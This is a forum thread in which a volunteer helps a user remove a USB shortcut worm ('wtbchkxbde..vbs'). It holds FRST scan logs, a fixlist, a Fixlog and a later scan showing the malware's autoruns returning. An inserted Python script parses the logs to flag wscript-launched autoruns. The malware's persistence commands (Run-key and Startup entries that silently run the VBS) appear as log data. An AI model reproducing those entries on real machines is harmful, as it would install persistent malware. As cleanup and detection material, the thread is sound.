2014-04-16 03:35 - 2014-04-16 02:56 - 00000000 ____D () C:\Windows\erdnt 2014-04-16 03:15 - 2009-07-14 04:34 - 00000215 _____ () C:\Windows\system.ini 2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\ProgramData\Panda Security 2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\Program Files (x86)\Panda USB Vaccine 2014-04-16 02:50 - 2014-04-16 02:50 - 00003072 _____ () C:\Windows\System32\Tasks\PandaUSBVaccine 2014-04-16 02:48 - 2014-04-16 02:47 - 05194807 ____R (Swearware) C:\Users\Franz\Desktop\ComboFix.exe 2014-04-15 10:30 - 2013-04-16 20:22 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\vlc 2014-04-14 10:42 - 2014-04-14 10:40 - 02157568 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe 2014-04-14 10:20 - 2013-04-16 21:29 - 00000000 ____D () C:\Setups 2014-04-12 01:15 - 2014-04-03 10:10 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD 2014-04-09 11:28 - 2013-04-16 19:54 - 00000000 ___RD () C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 2014-04-09 10:19 - 2014-04-07 09:32 - 00000000 ____D () C:\[Smad-Cage] 2014-04-07 09:30 - 2014-04-07 09:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files 2014-04-06 08:23 - 2013-04-16 20:09 - 00004104 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA 2014-04-06 08:23 - 2013-04-16 20:09 - 00003852 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore 2014-04-03 09:51 - 2014-04-16 23:06 - 00088280 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys 2014-04-03 09:51 - 2014-04-16 23:06 - 00063192 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys 2014-04-03 09:50 - 2014-04-16 23:06 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys 2014-04-02 08:54 - 2014-04-02 08:19 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE 2014-04-02 08:27 - 2014-04-02 08:27 - 00000000 ____D () C:\Windows\pss 2014-04-02 08:25 - 2013-04-16 20:39 - 00000000 ___RD () C:\Users\Franz\Desktop\Dropbox 
2014-04-02 08:24 - 2013-04-16 20:35 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\Dropbox 2014-04-02 08:19 - 2014-04-02 08:19 - 00000000 ____D () C:\ProgramData\Norton 2014-04-02 08:03 - 2013-04-16 20:10 - 00002179 _____ () C:\Users\Public\Desktop\Google Chrome.lnk 2014-03-31 04:12 - 2014-02-28 13:54 - 00000000 ____D () C:\Users\Franz\Desktop\Fotos 2014-03-27 00:58 - 2013-10-03 22:57 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\uTorrent 2014-03-25 09:41 - 2014-03-25 09:41 - 00003416 ____N () C:\bootsqm.dat 2014-03-25 09:40 - 2014-03-25 09:40 - 00000000 ____D () C:\found.001 2014-03-24 01:36 - 2014-03-21 07:44 - 00000000 ____D () C:\Users\Franz\AppData\Local\Microsoft Games 2014-03-23 13:40 - 2014-02-28 13:57 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\iFunbox_UserCache 2014-03-19 13:05 - 2014-03-19 13:05 - 00000000 ____D () C:\Users\Franz\Desktop\Neu Some content of TEMP: ==================== C:\Users\Franz\AppData\Local\Temp\avgnt.exe C:\Users\Franz\AppData\Local\Temp\Quarantine.exe C:\Users\Franz\AppData\Local\Temp\{04F28610-2CBA-4508-A95B-D654F15084A8}-34.0.1847.116_33.0.1750.154_chrome_updater.exe ==================== Bamital & volsnap Check ================= C:\Windows\System32\winlogon.exe => MD5 is legit C:\Windows\System32\wininit.exe => MD5 is legit C:\Windows\SysWOW64\wininit.exe => MD5 is legit C:\Windows\explorer.exe => MD5 is legit C:\Windows\SysWOW64\explorer.exe => MD5 is legit C:\Windows\System32\svchost.exe => MD5 is legit C:\Windows\SysWOW64\svchost.exe => MD5 is legit C:\Windows\System32\services.exe => MD5 is legit C:\Windows\System32\User32.dll => MD5 is legit C:\Windows\SysWOW64\User32.dll => MD5 is legit C:\Windows\System32\userinit.exe => MD5 is legit C:\Windows\SysWOW64\userinit.exe => MD5 is legit C:\Windows\System32\rpcss.dll => MD5 is legit C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit LastRegBack: 2014-03-24 00:49 ==================== End Of Log ============================ |
18.04.2014, 17:01 | #10 |
/// the machine /// TB trainer | Flash Drive Shortcut Virus wtbchkxbde..vbs First off, we have killed everything all round. Please press the Windows key + R and type notepad into the Run window. Now copy the following text from the code box into the empty text document. Code:
HKLM\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
HKLM-x32\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs"
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
Startup: C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs ()
2014-04-01 04:51 - 2013-09-22 17:47 - 00073266 _____ () C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs

Please save this as Fixlist.txt on your desktop (or in the directory where FRST is located).
__________________ Regards, schrauber Proud Member of UNITE and ASAP since 2009 Donate Guides and help Trojaner-Board Facebook page No help via PM! |
18.04.2014, 22:27 | #11 |
| Flash Drive Shortcut Virus wtbchkxbde..vbs I have done everything; the .vbs still comes back onto the stick after formatting. Fixlog.txt: Code:
Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 17-04-2014 01
Ran by Franz at 2014-04-18 23:14:09 Run:1
Running from C:\Users\Franz\Desktop
Boot Mode: Normal
==============================================
Content of fixlist:
*****************
HKLM\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
HKLM-x32\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs"
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
Startup: C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs ()
2014-04-01 04:51 - 2013-09-22 17:47 - 00073266 _____ () C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs
*****************
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\wtbchkxbde => Value deleted successfully.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\wtbchkxbde => Value deleted successfully.
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\Software\Microsoft\Windows\CurrentVersion\Run\\wtbchkxbde => Value deleted successfully.
C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs => Moved successfully.
Could not move "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" => Scheduled to move on reboot.
=> Result of Scheduled Files to move (Boot Mode: Normal) (Date&Time: 2014-04-18 23:16:01)<=
C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs => Is moved successfully.
==== End of Fixlog ==== |
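The hand-picked fixlist in this thread (autoruns that start a script through wscript.exe, the Startup-folder copy, and the script file itself) and the check of a later scan for entries that came back can be scripted. The Python below is an added example, not part of the thread and not FRST's own code; it assumes the FRST line shapes seen in the logs posted here, its function names are made up for illustration, and the sample lines are copied from those logs.

```python
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf")

# Line shapes as they appear in the FRST logs posted in this thread (assumption:
# other FRST versions may format these sections differently).
RUN_RE = re.compile(r'^(?P<key>HK\S+\\\.\.\.\\Run): \[(?P<name>[^\]]*)\] => (?P<cmd>.*)$')
STARTUP_RE = re.compile(r'^Startup: (?P<path>.+?) \([^()]*\)$')
FILE_RE = re.compile(r'^\d{4}-\d\d-\d\d \d\d:\d\d - \d{4}-\d\d-\d\d \d\d:\d\d - \d+ \S+ '
                     r'\([^()]*\) (?P<path>.+)$')
MARKER_RE = re.compile(r'\s*<=+ ATTENTION\s*$')
PROGRAM_RE = re.compile(r'"([^"]+)"|(.*?\.\w{2,4})(?=\s|$)')


def analyse_command(cmd):
    """Return (uses_script_host, [script paths]) for one autorun command."""
    cmd = MARKER_RE.sub("", cmd)
    m = PROGRAM_RE.match(cmd)
    program = (m.group(1) or m.group(2)) if m else cmd
    uses_host = program.rsplit("\\", 1)[-1].lower() in SCRIPT_HOSTS
    candidates = [program] + re.findall(r'"([^"]+)"', cmd)
    scripts = sorted({p for p in candidates if p.lower().endswith(SCRIPT_EXTS)})
    return uses_host, scripts


def build_fixlist(log_lines):
    """Pick script-based autoruns and the files they reference, in log order."""
    lines = [l.strip() for l in log_lines if l.strip()]
    flagged, scripts = set(), set()
    for i, line in enumerate(lines):
        run, startup = RUN_RE.match(line), STARTUP_RE.match(line)
        if run:
            uses_host, targets = analyse_command(run["cmd"])
            if uses_host or targets:
                flagged.add(i)
                scripts.update(t.lower() for t in targets)
        elif startup and startup["path"].lower().endswith(SCRIPT_EXTS):
            flagged.add(i)
    # Second pass: file-listing lines for the scripts those autoruns execute.
    for i, line in enumerate(lines):
        listed = FILE_RE.match(line)
        if listed and listed["path"].lower() in scripts:
            flagged.add(i)
    return [lines[i] for i in sorted(flagged)]


def identity(line):
    """Key that identifies an autorun independent of markers or command text."""
    run = RUN_RE.match(line)
    if run:
        return ("run", run["key"].lower(), run["name"].lower())
    startup = STARTUP_RE.match(line)
    if startup:
        return ("startup", startup["path"].lower())
    return None


def reappeared(fixlist, later_log_lines):
    """Return lines of a later scan whose autorun was already in the fixlist."""
    removed = {identity(l.strip()) for l in fixlist} - {None}
    return [l.strip() for l in later_log_lines if identity(l.strip()) in removed]


# Lines copied from the first FRST log in this thread (benign and flagged mixed).
FIRST_SCAN = r'''
HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [345648 2010-03-09] (Alps Electric Co., Ltd.)
HKLM\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs"
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [NetLimiter] => C:\Program Files\NetLimiter 3\NLClientApp.exe [2910208 2011-03-21] (Locktime Software)
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
Startup: C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs ()
2014-04-16 02:47 - 2014-04-16 02:48 - 05194807 ____R (Swearware) C:\Users\Franz\Desktop\ComboFix.exe
2014-04-01 04:51 - 2013-09-22 17:47 - 00073266 _____ () C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs
'''

# Lines copied from the FRST log taken after the fix was run.
LATER_SCAN = r'''
HKLM\...\Run: [BCSSync] => C:\Program Files\Microsoft Office\Office14\BCSSync.exe [108144 2012-11-05] (Microsoft Corporation)
HKLM\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
HKLM-x32\...\Run: [LManager] => C:\Program Files (x86)\Launch Manager\LManager.exe [960080 2010-05-26] (Dritek System Inc.)
'''

if __name__ == "__main__":
    fixlist = build_fixlist(FIRST_SCAN.splitlines())
    print("Fixlist candidates:", *fixlist, sep="\n  ")
    print("Back after the fix:", *reappeared(fixlist, LATER_SCAN.splitlines()), sep="\n  ")
```

An entry that shows up again after the Fixlog reported "Value deleted successfully" was rewritten after the fix, so the process list of the same scan is the next place to look.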
19.04.2014, 12:38 | #12 |
/// the machine /// TB trainer | Flash Drive Shortcut Virus wtbchkxbde..vbs A fresh FRST log, please.
__________________ Regards, schrauber Proud Member of UNITE and ASAP since 2009 Donate Guides and help Trojaner-Board Facebook page No help via PM! |
20.04.2014, 04:23 | #13 |
| Flash Drive Shortcut Virus wtbchkxbde..vbs FRST.txt: FRST Logfile: Code:
ATTFilter Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 17-04-2014 01 Ran by Franz (administrator) on FRANZ-PC on 20-04-2014 05:20:46 Running from C:\Users\Franz\Desktop Windows 7 Home Premium (X64) OS Language: German Standard Internet Explorer Version 9 Boot Mode: Normal ==================== Processes (Whitelisted) ================= (AMD) C:\Windows\system32\atiesrxx.exe (Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe (AMD) C:\Windows\system32\atieclxx.exe (Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe (Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\adminservice.exe (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe (Dritek System Inc.) C:\Program Files (x86)\Launch Manager\dsiwmis.exe (Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe (Locktime Software) C:\Program Files\NetLimiter 3\nlsvc.exe (NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe (Acer Incorporated) C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe (Acer Group) C:\Program Files\Acer\Acer Updater\UpdaterService.exe (Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE (Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe (Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe (Alcor Micro Corp.) 
C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe (Intel Corporation) C:\Windows\System32\igfxpers.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe (Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe (Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe (Locktime Software) C:\Program Files\NetLimiter 3\NLClientApp.exe (Acer Incorporated) C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe (Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe (Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apntex.exe (Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\HidFind.exe (NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe (Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LManager.exe (Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe (Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe (Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe (Microsoft Corporation) C:\Windows\System32\wscript.exe (Dritek System Inc.) C:\Program Files (x86)\Launch Manager\MMDx64Fx.exe (Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LMworker.exe (Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe (Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTray.exe (Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerEvent.exe (Intel Corporation) C:\Windows\system32\igfxext.exe (Intel Corporation) C:\Windows\system32\igfxsrvc.exe (Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe (ATI Technologies Inc.) 
C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\distnoted.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServer.exe (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE (Panda Security) C:\Program Files (x86)\Panda USB Vaccine\USBVaccine.exe ==================== Registry (Whitelisted) ================== HKLM\...\Run: [AmIcoSinglun64] => C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe [323584 2009-09-23] (Alcor Micro Corp.) 
HKLM\...\Run: [mwlDaemon] => C:\Program Files (x86)\EgisTec MyWinLocker\x86\mwlDaemon.exe HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [9996320 2010-01-20] (Realtek Semiconductor) HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [877600 2010-01-20] (Realtek Semiconductor) HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [585376 2010-05-25] (Atheros Commnucations) HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [354464 2010-05-25] (Atheros Commnucations) HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [345648 2010-03-09] (Alps Electric Co., Ltd.) HKLM\...\Run: [Acer ePower Management] => C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTrayLauncher.exe [496160 2010-02-02] (Acer Incorporated) HKLM\...\Run: [BCSSync] => C:\Program Files\Microsoft Office\Office14\BCSSync.exe [108144 2012-11-05] (Microsoft Corporation) HKLM\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION HKLM-x32\...\Run: [BackupManagerTray] => C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe [260608 2010-03-09] (NewTech Infosystems, Inc.) HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-04-21] (Advanced Micro Devices, Inc.) HKLM-x32\...\Run: [LManager] => C:\Program Files (x86)\Launch Manager\LManager.exe [960080 2010-05-26] (Dritek System Inc.) HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-02-12] (Apple Inc.) HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [689744 2014-02-20] (Avira Operations GmbH & Co. 
KG) HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [49208 2011-10-28] (Hewlett-Packard) HKLM-x32\...\Run: [] => [X] HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-02-21] (Apple Inc.) Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation) HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [NetLimiter] => C:\Program Files\NetLimiter 3\NLClientApp.exe [2910208 2011-03-21] (Locktime Software) HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION Startup: C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs () ==================== Internet (Whitelisted) ==================== HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com.ph/intl/en/ HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596 StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe SearchScopes: HKLM-x32 - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW SearchScopes: HKCU - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = 
hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW_deDE532 BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation) BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.) BHO: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation) BHO-x32: Adobe PDF Link Helper - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - c:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated) BHO-x32: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation) BHO-x32: Microsoft-Konto-Anmelde-Hilfsprogramm - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.) 
BHO-x32: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation) Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies) FireFox: ======== FF Plugin: @microsoft.com/GENUINE - disabled No File FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation) FF Plugin: @videolan.org/vlc,version=2.0.6 - C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN) FF Plugin-x32: @Apple.com/iTunes,version=1.0 - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll () FF Plugin-x32: @microsoft.com/GENUINE - disabled No File FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 - C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation) FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3508.0205 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.) 
Chrome: ======= CHR Plugin: (Shockwave Flash) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\PepperFlash\11.7.700.202\pepflashplayer.dll No File CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\ppGoogleNaClPluginChrome.dll () CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\pdf.dll () CHR Plugin: (Adobe Acrobat) - c:\Program Files (x86)\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.) CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation) CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation) CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.135\npGoogleUpdate3.dll No File CHR Plugin: (iTunes Application Detector) - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll () CHR Extension: (Google Docs) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-05-15] CHR Extension: (Google Drive) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-05-15] CHR Extension: (YouTube) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-05-15] CHR Extension: (Google-Suche) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-05-15] CHR Extension: (Google Wallet) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-10] ==================== Services (Whitelisted) ================= R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [440400 2014-02-20] (Avira Operations GmbH & Co. 
KG) R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [440400 2014-02-20] (Avira Operations GmbH & Co. KG) R2 ePowerSvc; C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe [820768 2010-02-02] (Acer Incorporated) R2 nlsvc; C:\Program Files\NetLimiter 3\nlsvc.exe [1845248 2011-03-21] (Locktime Software) R2 RS_Service; C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe [260640 2010-01-29] (Acer Incorporated) ==================== Drivers (Whitelisted) ==================== U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-14] (Microsoft Corporation) R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [108440 2013-12-22] (Avira Operations GmbH & Co. KG) R1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [131576 2013-12-22] (Avira Operations GmbH & Co. KG) R1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [28600 2013-12-15] (Avira Operations GmbH & Co. KG) R1 nltdi; C:\Program Files\NetLimiter 3\nltdi.sys [88200 2011-03-21] (Locktime Software) S3 catchme; \??\C:\ComboFix\catchme.sys [X] ==================== NetSvcs (Whitelisted) =================== ==================== One Month Created Files and Folders ======== 2014-04-20 05:20 - 2014-04-20 05:20 - 00015472 _____ () C:\Users\Franz\Desktop\FRST.txt 2014-04-18 23:16 - 2013-09-22 17:47 - 00073266 _____ () C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs 2014-04-18 23:13 - 2014-04-18 23:13 - 00000000 ____D () C:\Users\Franz\Desktop\FRST-OlderVersion 2014-04-16 23:57 - 2014-04-16 23:59 - 00000041 _____ () C:\Users\Franz\Desktop\pw.txt 2014-04-16 23:46 - 2014-04-16 23:46 - 00000000 ____D () 